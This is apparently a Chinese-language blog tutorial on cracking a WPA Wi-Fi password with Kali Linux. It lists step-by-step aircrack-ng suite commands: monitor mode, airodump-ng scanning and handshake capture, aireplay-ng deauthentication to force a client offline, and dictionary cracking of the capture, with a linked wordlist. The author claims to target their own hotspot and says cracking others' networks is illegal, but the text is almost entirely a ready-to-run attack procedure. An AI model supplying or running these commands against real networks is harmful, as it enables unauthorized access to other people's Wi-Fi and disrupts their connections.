開始
1、選擇合適的網卡,有些網卡kali識別不了,我用的網卡信息
2、網卡開啟監聽模式
3、查看監聽模式是否開啟成功(網卡名稱變成wlan0mon說明已經開啟成功)
4、輸入“airodump-ng wlan0mon”,掃描附近熱點信息,找到自己想要破解的熱點名稱后按下ctrl+c停止掃描(NEM-AL10是我自己用手機開啟的熱點,破解他人無線密碼是違法的,自己搭個熱點玩玩就行)
5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目錄}”輸入:airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,當抓到握手包的時候箭頭處會顯示”handshake“字樣
6、可以看到現在抓不到握手包,是因為沒有客戶端與AP進行連接。但是我們看到了一個已連接的熱點,我們發送反認證包,讓其下線,然后改客戶端會重新嘗試連接熱點,然后我們就可以抓到握手包了。
新開一個終端窗口,命令格式為:aireplay-ng -0 {發送反認證包的個數} -a {BSSID} -c {強制下線的MAC地址(STATION下面的地址)} 無線網卡名稱
輸入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系統會下線,然后重新連接,然后我們就可以抓到握手包了。
7、按下ctrl+c停止抓包。進到/home目錄下查看握手包,其中"-01.cap"是我們一會兒破解要用到的數據包
8、使用aircrack-ng進行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的關鍵)} {握手包}
輸入"aircrack-ng -w top3000.txt /home/-01.cap",由於握手包命名的特殊性,這里只能使用絕對路徑,可以改個名字就可以使用相對路徑了
字典網上有好多,這個是github上的:https://github.com/conwnet/wpa-dictionary
結語:
破解的原理還是一個一個試,之所以要抓握手包,是因為握手包中含有經過加密的密碼,我們將握手包抓下來后,可以在本地跑字典破解,並且每秒鍾可以試幾萬個密碼,但是如果沒有握手包,我們只能手動輸密碼,那樣是很慢的,即使可以用程序來跑,也不能保證路由器沒有設置錯誤次數,有可能會禁止連接,即使沒有設置錯誤次數,但是每次與路由器交互的過程所需要耗費的時間也大於一秒。